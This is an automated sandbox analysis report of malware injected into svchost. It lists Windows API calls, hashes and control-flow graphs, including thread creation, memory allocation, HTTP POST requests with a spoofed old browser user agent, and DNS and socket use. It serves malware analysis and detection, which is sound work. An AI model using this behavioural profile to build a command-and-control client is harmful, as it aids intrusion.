                                                                                                                                                                                                                                                          • CreateThread.KERNELBASE(00000000,0000FA00,13144898,00000000,00000000,1315B68C), ref: 131432A4
                                                                                                                                                                                                                                                          • CreateThread.KERNELBASE(00000000,0000FA00,1314CCD7,00000000,00000000,1315B694), ref: 131432B8
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000008.00000002.2788914206.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_8_2_13140000_svchost.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Thread$Create$Sleep$Current
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 773548574-0
                                                                                                                                                                                                                                                          • Opcode ID: 485e2c268a206b43ffbfe4ffce24d5252f72a8d4056e7c0c36fab4777ce81126
                                                                                                                                                                                                                                                          • Instruction ID: dd442d82ce1d7506068b13048ddc8b54df2e144e20bd1b72f1d0a51d7373427f
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 485e2c268a206b43ffbfe4ffce24d5252f72a8d4056e7c0c36fab4777ce81126
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4D11E1F07813AA7FF6106B718CC4DB73AACEB8678AB204929F521A2086D7249C049970
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                          control_flow_graph 364 131504ae-131504bd 365 131504c3-131504c7 364->365 366 131506c9-131506cb 364->366 365->366 367 131504cd-131504e2 StrStrA 365->367 368 13150585-13150592 StrStrA 367->368 369 131504e8-13150501 call 13145107 call 1315040e 367->369 370 13150594-1315059e StrStrA 368->370 371 131505f1-1315060a call 13144c7d call 1315040e 368->371 384 13150511-13150519 StrStrA 369->384 385 13150503-1315050c call 1315035b 369->385 370->371 373 131505a0-131505ca call 13144fe9 call 13144f29 wnsprintfA 370->373 387 13150642-13150652 call 13150450 371->387 388 1315060c-13150610 371->388 389 131506c7-131506c8 373->389 395 131505d0-131505e0 call 131504ae 373->395 384->389 390 1315051f-13150539 call 131504ae 384->390 385->384 406 13150654-13150659 387->406 407 1315068a-13150691 387->407 392 13150616-13150618 388->392 393 13150612-13150614 388->393 389->366 402 13150574-1315057a StrStrA 390->402 397 1315062d-13150638 call 1315035b 392->397 399 1315061a-13150628 call 131502cc 392->399 393->392 393->397 412 131505e3-131505ec call 13144c1f 395->412 411 1315063d 397->411 399->389 413 1315057c-13150583 402->413 414 1315053b-13150548 StrStrA 402->414 406->407 415 1315065b-13150662 406->415 409 13150697-13150699 407->409 410 13150693-13150695 407->410 420 131506b4-131506c3 409->420 421 1315069b-131506b2 call 13145107 409->421 410->409 410->420 411->389 412->389 413->412 418 1315054d-13150553 414->418 419 1315054a 414->419 416 13150664-13150666 415->416 417 13150668-1315066a 415->417 416->417 423 1315067a-13150688 call 13150217 416->423 417->423 424 1315066c-13150678 call 13150155 417->424 425 13150555-13150558 418->425 426 1315056a-1315056c 418->426 419->418 420->389 421->389 423->389 424->389 425->426 431 1315055a-13150567 call 131504ae 425->431 426->413 432 1315056e-13150573 426->432 431->426 432->402
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • StrStrA.SHLWAPI(00000000,131414A0,?,00000000,00000000,?,?), ref: 131504DE
                                                                                                                                                                                                                                                          • StrStrA.SHLWAPI(00000000,131414A0,00000000), ref: 13150515
                                                                                                                                                                                                                                                          • StrStrA.SHLWAPI(00000001,131414A0), ref: 13150541
                                                                                                                                                                                                                                                          • StrStrA.SHLWAPI(?,131414A0), ref: 13150574
                                                                                                                                                                                                                                                          • StrStrA.SHLWAPI(00000000,131413AC), ref: 1315058E
                                                                                                                                                                                                                                                          • StrStrA.SHLWAPI(00000000,1314149C), ref: 1315059A
                                                                                                                                                                                                                                                          • wnsprintfA.SHLWAPI ref: 131505BF
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000008.00000002.2788914206.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_8_2_13140000_svchost.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: wnsprintf
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 167729887-0
                                                                                                                                                                                                                                                          • Opcode ID: 75dab7dbaf131a694454513c8109fb167d089e46b0066a399625cf1165def889
                                                                                                                                                                                                                                                          • Instruction ID: 243af7390c0885436e9854db75e32d55ee869c31370201af5ee67116e9b61509
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 75dab7dbaf131a694454513c8109fb167d089e46b0066a399625cf1165def889
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5C61AF75A01249FFDF114FA5CD40FAE3F6AAF87254F198029FC749A2A0CB31D941DA60
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • GetVersion.KERNEL32(00020000,76122E60,00000000), ref: 1314302C
                                                                                                                                                                                                                                                          • GetCommandLineA.KERNEL32(00000000,0000004A,00000000,0000003C), ref: 13143086
                                                                                                                                                                                                                                                          • StrStrIA.SHLWAPI(00000000,00000000,0000007B), ref: 131430A7
                                                                                                                                                                                                                                                          • inet_addr.WS2_32(00000000), ref: 131430D2
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000008.00000002.2788914206.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_8_2_13140000_svchost.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: CommandLineVersioninet_addr
                                                                                                                                                                                                                                                          • String ID: UyB
                                                                                                                                                                                                                                                          • API String ID: 4064751120-4078557002
                                                                                                                                                                                                                                                          • Opcode ID: d62363ce5baa6cb28e2e9e87307aa3534d67073ac274f1eb0d89fd005e112189
                                                                                                                                                                                                                                                          • Instruction ID: 69915f827bd4f4389c55c8526bcd49d3ee977bc70560e42c9cfe2d9561d34fc1
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d62363ce5baa6cb28e2e9e87307aa3534d67073ac274f1eb0d89fd005e112189
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 695175B9740354B7D724EBA9CC8DF9A3B29EBC2B59F14083DF105DA1C1EB74A444CA25
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                          control_flow_graph 511 13144bc5-13144bdb HeapCreate 512 13144c13-13144c1e 511->512 513 13144bdd-13144bf3 HeapCreate 511->513 514 13144bf5-13144c05 HeapCreate 513->514 515 13144c12 513->515 514->515 516 13144c07-13144c0d GetProcessHeap 514->516 515->512 516->515
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • HeapCreate.KERNELBASE(00000000,00000000,00000000,LoadLibraryExA,?,1314337F,00000000,00016AF0,LoadLibraryExA,?), ref: 13144BD2
                                                                                                                                                                                                                                                          • HeapCreate.KERNEL32(00000000,001E8480,1DCD6500,00016AF0), ref: 13144BEA
                                                                                                                                                                                                                                                          • HeapCreate.KERNEL32(00000000,001E8480,05F5E100), ref: 13144BFC
                                                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32 ref: 13144C07
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000008.00000002.2788914206.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_8_2_13140000_svchost.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Heap$Create$Process
                                                                                                                                                                                                                                                          • String ID: LoadLibraryExA
                                                                                                                                                                                                                                                          • API String ID: 846323464-2601528877
                                                                                                                                                                                                                                                          • Opcode ID: 2e8d6702a9d4fa7ee5d00ea2ac3fa87fef18c2b02f9a4083b144cebf07a7a476
                                                                                                                                                                                                                                                          • Instruction ID: 340928ed9c63ac25230cf3f699ca75f3c2cd4d17112b793a2d8b979986149470
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2e8d6702a9d4fa7ee5d00ea2ac3fa87fef18c2b02f9a4083b144cebf07a7a476
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A2F0A7B06012A56FCB04AF364EC0C4BAFDCE34935C364A83EF105E2504FB3888858BB0
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • GetEnvironmentVariableA.KERNEL32(-00000004,0000002B,C:\Windows\system32\regedit.exe,00000103,LoadLibraryExA), ref: 131453EC
                                                                                                                                                                                                                                                          • PathAddBackslashA.KERNELBASE(C:\Windows\system32\regedit.exe), ref: 131453F7
                                                                                                                                                                                                                                                            • Part of subcall function 13142F79: lstrlenA.KERNEL32(?,C:\Windows\system32\regedit.exe,00000103,LoadLibraryExA), ref: 13142FDC
                                                                                                                                                                                                                                                          • PathAppendA.SHLWAPI(C:\Windows\system32\regedit.exe,-00000004,00000028), ref: 1314540C
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000008.00000002.2788914206.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_8_2_13140000_svchost.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Path$AppendBackslashEnvironmentVariablelstrlen
                                                                                                                                                                                                                                                          • String ID: C:\Windows\system32\regedit.exe$LoadLibraryExA
                                                                                                                                                                                                                                                          • API String ID: 3711117582-2466685467
                                                                                                                                                                                                                                                          • Opcode ID: bb94435e3141b6c6865afd970c13751078a8f23207b948a7b406e9d98e6884c3
                                                                                                                                                                                                                                                          • Instruction ID: f2fba57a893278f7b18921d85e771a08421c937711f0f5b5b8013211c7d59eed
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bb94435e3141b6c6865afd970c13751078a8f23207b948a7b406e9d98e6884c3
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8AE01A76B4122477EA047BA98D4EFDA3A2CDB11B59B440030F902F55C4EB94E54286A9
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                          control_flow_graph 524 4002120-4002131 525 4002137-400213b 524->525 526 400225b-4002261 524->526 525->526 527 4002141-4002145 525->527 527->526 528 400214b-400216c lstrlenA * 2 527->528 529 4002173-4002179 528->529 530 40021b0-40021d3 VirtualAlloc 529->530 531 400217b-4002193 StrStrIA 529->531 530->526 534 40021d9-40021e0 530->534 532 4002195-40021ae 531->532 533 40021ac 531->533 532->529 533->530 536 40021e7-40021ed 534->536 536->526 537 40021ef-4002207 StrStrIA 536->537 538 4002209-4002259 lstrcpynA 537->538 539 400224f 537->539 538->536 539->526
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(00000000), ref: 0400214F
                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(00000000), ref: 0400215C
                                                                                                                                                                                                                                                          • StrStrIA.KERNELBASE(00000000,00000000), ref: 04002186
                                                                                                                                                                                                                                                          • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004), ref: 040021C6
                                                                                                                                                                                                                                                          • StrStrIA.SHLWAPI(00000000,00000000), ref: 040021FA
                                                                                                                                                                                                                                                          • lstrcpynA.KERNEL32(00000000,00000000,-00000001), ref: 04002229
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000008.00000002.2775645730.0000000004000000.00000040.00000400.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_8_2_4000000_svchost.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: lstrlen$AllocVirtuallstrcpyn
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 1165442690-0
                                                                                                                                                                                                                                                          • Opcode ID: 46478cc78d8ed65e962a0453220b7aab9d4c5308cbe5d96cdd6cddbf7ab7e3a3
                                                                                                                                                                                                                                                          • Instruction ID: 8e5106bfe710839a6185bbadd48f64f24d95943a02d63ef35a25000e1e6e3557
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 46478cc78d8ed65e962a0453220b7aab9d4c5308cbe5d96cdd6cddbf7ab7e3a3
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AF41A470901109EBDB04CFD8C998BEEBBB5FB88309F10C599E915B7284D338AA41CB91
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • wsprintfA.USER32 ref: 04001C0A
                                                                                                                                                                                                                                                            • Part of subcall function 04002080: QueryPerformanceCounter.KERNEL32(00000000), ref: 04002094
                                                                                                                                                                                                                                                            • Part of subcall function 040020B0: QueryPerformanceCounter.KERNEL32(?), ref: 040020E7
                                                                                                                                                                                                                                                            • Part of subcall function 040010A0: InternetCrackUrlA.WININET(00000000,00000000,00000000,0000003C), ref: 04001158
                                                                                                                                                                                                                                                            • Part of subcall function 040010A0: InternetOpenA.WININET(Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1),00000001,00000000,00000000,00000000), ref: 04001173
                                                                                                                                                                                                                                                            • Part of subcall function 040010A0: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 040011AC
                                                                                                                                                                                                                                                            • Part of subcall function 040010A0: HttpOpenRequestA.WININET(00000000,POST,?,00000000,00000000,040030AC,00600100,00000000), ref: 040011EA
                                                                                                                                                                                                                                                            • Part of subcall function 040010A0: wnsprintfA.SHLWAPI ref: 04001218
                                                                                                                                                                                                                                                            • Part of subcall function 040010A0: HttpAddRequestHeadersA.WININET(00000000,?,000000FF,00000000), ref: 04001233
                                                                                                                                                                                                                                                          • Sleep.KERNELBASE(00000000), ref: 04001C60
                                                                                                                                                                                                                                                          • Sleep.KERNELBASE(00000000), ref: 04001C98
                                                                                                                                                                                                                                                          • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 04001CAE
                                                                                                                                                                                                                                                          • CoUninitialize.OLE32 ref: 04001CB9
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000008.00000002.2775645730.0000000004000000.00000040.00000400.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_8_2_4000000_svchost.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Internet$CounterHttpOpenPerformanceQueryRequestSleep$ConnectCrackFreeHeadersUninitializeVirtualwnsprintfwsprintf
                                                                                                                                                                                                                                                          • String ID: http://%s/
                                                                                                                                                                                                                                                          • API String ID: 3410617123-3353559419
                                                                                                                                                                                                                                                          • Opcode ID: 13d162de3e64c141ef0ae81f3563af103fc5faf5f2605bcaf84b3834cc00689f
                                                                                                                                                                                                                                                          • Instruction ID: 81a1c40e0812fe05308fe9829dd288aa633f73d773d73b740ab164a7fdf0e2aa
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 13d162de3e64c141ef0ae81f3563af103fc5faf5f2605bcaf84b3834cc00689f
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 202145B1E01104ABEB14DB94DC45FEEB775AF58308F1481A5E605BA181E635EA80CF56
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • Sleep.KERNELBASE(00000001), ref: 1314CD07
                                                                                                                                                                                                                                                            • Part of subcall function 13144D0B: _memset.LIBCMT ref: 13144D29
                                                                                                                                                                                                                                                            • Part of subcall function 13144EA1: EnterCriticalSection.KERNEL32(00000000,1314E2F0,?,00000000,00000000,-00000004), ref: 13144EAC
                                                                                                                                                                                                                                                            • Part of subcall function 131518CB: EnterCriticalSection.KERNEL32(06201028,13161EF0,00000000,06201020,06201020,?,1314CD55,?,13161EF0,131616E8), ref: 131518DE
                                                                                                                                                                                                                                                            • Part of subcall function 131518CB: LeaveCriticalSection.KERNEL32(06201028,?,1314CD55,?), ref: 131518EB
                                                                                                                                                                                                                                                            • Part of subcall function 13144EB3: LeaveCriticalSection.KERNEL32(00000000,1314E30B,?,00000000,00000000,-00000004), ref: 13144EBE
                                                                                                                                                                                                                                                          • select.WS2_32(00000000,13161EF0,00000000,131616E8,?), ref: 1314CDB0
                                                                                                                                                                                                                                                          • __WSAFDIsSet.WS2_32(?,13161EF0), ref: 1314CE0D
                                                                                                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 1314CF50
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000008.00000002.2788914206.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_8_2_13140000_svchost.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: CriticalSection$EnterLeave$CountSleepTick_memsetselect
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 462285117-0
                                                                                                                                                                                                                                                          • Opcode ID: bc6f7c878f98143a391d096ed0f0a874d9c00021e8d9e1d7048eb94279f4efec
                                                                                                                                                                                                                                                          • Instruction ID: 804a398415ae26fc5b7eb0287963a1101ec9206849f780cd4644be78a764b607
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bc6f7c878f98143a391d096ed0f0a874d9c00021e8d9e1d7048eb94279f4efec
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7C819D79800316FFDF11DFA8D98099EBBF9FF05314B25053AE511B3290DB38AA518BA1
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                            • Part of subcall function 13142F79: lstrlenA.KERNEL32(?,C:\Windows\system32\regedit.exe,00000103,LoadLibraryExA), ref: 13142FDC
                                                                                                                                                                                                                                                          • ExitProcess.KERNEL32 ref: 13144927
                                                                                                                                                                                                                                                          • CreateThread.KERNEL32(00000000,0000FA00,13144384,?,00000000,00000000), ref: 13144AA2
                                                                                                                                                                                                                                                          • Sleep.KERNELBASE(0000000A,?), ref: 13144AF6
                                                                                                                                                                                                                                                          • Sleep.KERNELBASE(00000032,?,?,?), ref: 13144B15
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000008.00000002.2788914206.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_8_2_13140000_svchost.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Sleep$CreateExitProcessThreadlstrlen
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 409902211-0
                                                                                                                                                                                                                                                          • Opcode ID: 79e7f25478e3dcf90d08d694072f9f073b2716a9a12e304b42731dd851f2dc92
                                                                                                                                                                                                                                                          • Instruction ID: d88f6d14892378904b0dc470ab3adc977061ca48c0c3b786eb947c20e0c2d408
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 79e7f25478e3dcf90d08d694072f9f073b2716a9a12e304b42731dd851f2dc92
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2D710476A80350EFDB25EF59C9C5E5A7BF8EB86755F34002AE501F7244EB38A540CB60
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • InitializeCriticalSection.KERNEL32(00000000,76122E60,131433F1), ref: 131432DF
                                                                                                                                                                                                                                                          • InitializeCriticalSection.KERNEL32(00000000), ref: 131432F3
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000008.00000002.2788914206.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_8_2_13140000_svchost.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: CriticalInitializeSection
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 32694325-0
                                                                                                                                                                                                                                                          • Opcode ID: 6d9b36f4f60a96a16bc1a5a1d74fd316fff9ecd044a6f1fb14842f02da6bf71c
                                                                                                                                                                                                                                                          • Instruction ID: 6a4b42ed693ed77350d83cd620794c4273ef5989a6c03f0071cd9a173a3549bc
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6d9b36f4f60a96a16bc1a5a1d74fd316fff9ecd044a6f1fb14842f02da6bf71c
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EFF054B5A443316BFF18ABFD6D95B962E9CDB05765F24443BF505D2288EF688000DAA0
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                            • Part of subcall function 13144EA1: EnterCriticalSection.KERNEL32(00000000,1314E2F0,?,00000000,00000000,-00000004), ref: 13144EAC
                                                                                                                                                                                                                                                            • Part of subcall function 13144EB3: LeaveCriticalSection.KERNEL32(00000000,1314E30B,?,00000000,00000000,-00000004), ref: 13144EBE
                                                                                                                                                                                                                                                          • Sleep.KERNELBASE(00000001), ref: 131460EF
                                                                                                                                                                                                                                                          • Sleep.KERNEL32(00000064,-00000004,0000003F,00000000), ref: 1314613E
                                                                                                                                                                                                                                                            • Part of subcall function 1315181B: EnterCriticalSection.KERNEL32(06201028,00000000,00000000,761311A0,131461CD,00000000,00000000,000000FF), ref: 13151824
                                                                                                                                                                                                                                                            • Part of subcall function 1315181B: LeaveCriticalSection.KERNEL32(06201028), ref: 13151835
                                                                                                                                                                                                                                                          • Sleep.KERNEL32(00000001), ref: 131461E6
                                                                                                                                                                                                                                                          • Sleep.KERNEL32(000001F4), ref: 131461FF
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000008.00000002.2788914206.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_8_2_13140000_svchost.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: CriticalSectionSleep$EnterLeave
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 890587828-0
                                                                                                                                                                                                                                                          • Opcode ID: b3d4c390a716a34e06762df693a3c57ff7b247b2137afb7d70cd78e67ea98229
                                                                                                                                                                                                                                                          • Instruction ID: 08080a18ae1c1e4bd548ce539b053228da539052a701547300ae0ece9703ad5c
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b3d4c390a716a34e06762df693a3c57ff7b247b2137afb7d70cd78e67ea98229
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 91312734A00320EFCB15AB68CEA1A6D7265AFC2B3DF380935F542761D5DF756581C660
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • DnsExtractRecordsFromMessage_W.DNSAPI(?,0000000F,?), ref: 13143A10
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000008.00000002.2788914206.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_8_2_13140000_svchost.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: ExtractFromMessage_Records
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 894924593-0
                                                                                                                                                                                                                                                          • Opcode ID: 4c586eb58fa30a75f9e1ed9efa31ddc75e6a5d87de09b26d40666ab92f0f80b5
                                                                                                                                                                                                                                                          • Instruction ID: df9127fe6e69a006937c02b7eef08ad983db5171756fe820abb16109d46cd116
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4c586eb58fa30a75f9e1ed9efa31ddc75e6a5d87de09b26d40666ab92f0f80b5
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A7B12CB5900249EFCB11DF98CC809DEBBB9FF49304F25486AE954E7210E731AA60CF61
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • CreateThread.KERNELBASE(00000000,00000000,04001B70,00000000,00000000,00000000), ref: 04001B31
                                                                                                                                                                                                                                                          • CreateThread.KERNELBASE(00000000,00000000,04001CD0,00000000,00000000,00000000), ref: 04001B4B
                                                                                                                                                                                                                                                          • Sleep.KERNELBASE(000000FF), ref: 04001B55
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000008.00000002.2775645730.0000000004000000.00000040.00000400.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_8_2_4000000_svchost.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: CreateThread$Sleep
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 422425972-0
                                                                                                                                                                                                                                                          • Opcode ID: 911a9de0ce48e0813a73cc35970733eea27961472999e7db9f15ae2455a963c9
                                                                                                                                                                                                                                                          • Instruction ID: eea7b1e711cf4d7e54718b335fda834aed70efeb3a863995a80571137befa406
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 911a9de0ce48e0813a73cc35970733eea27961472999e7db9f15ae2455a963c9
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BA41C374A042A4EBFB21CB54CD51BDC77B1AB49309F04C2D5E5887A2C0D2F96BC49F62
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • htons.WS2_32(00000FA0), ref: 131462EC
                                                                                                                                                                                                                                                          • socket.WS2_32(00000002,00000002,00000011), ref: 13146307
                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,13143365,00016AF0,LoadLibraryExA,?), ref: 13146316
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000008.00000002.2788914206.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_8_2_13140000_svchost.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: ErrorLasthtonssocket
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 3100113635-0
                                                                                                                                                                                                                                                          • Opcode ID: 4798562a01600ef3f9dd65a926da48208d44cdd9dd444a59f9dfde149f2742bb
                                                                                                                                                                                                                                                          • Instruction ID: 7cd8044a41f5419db6204b812f03637fabde0fd073de533a2041f97633ced2a2
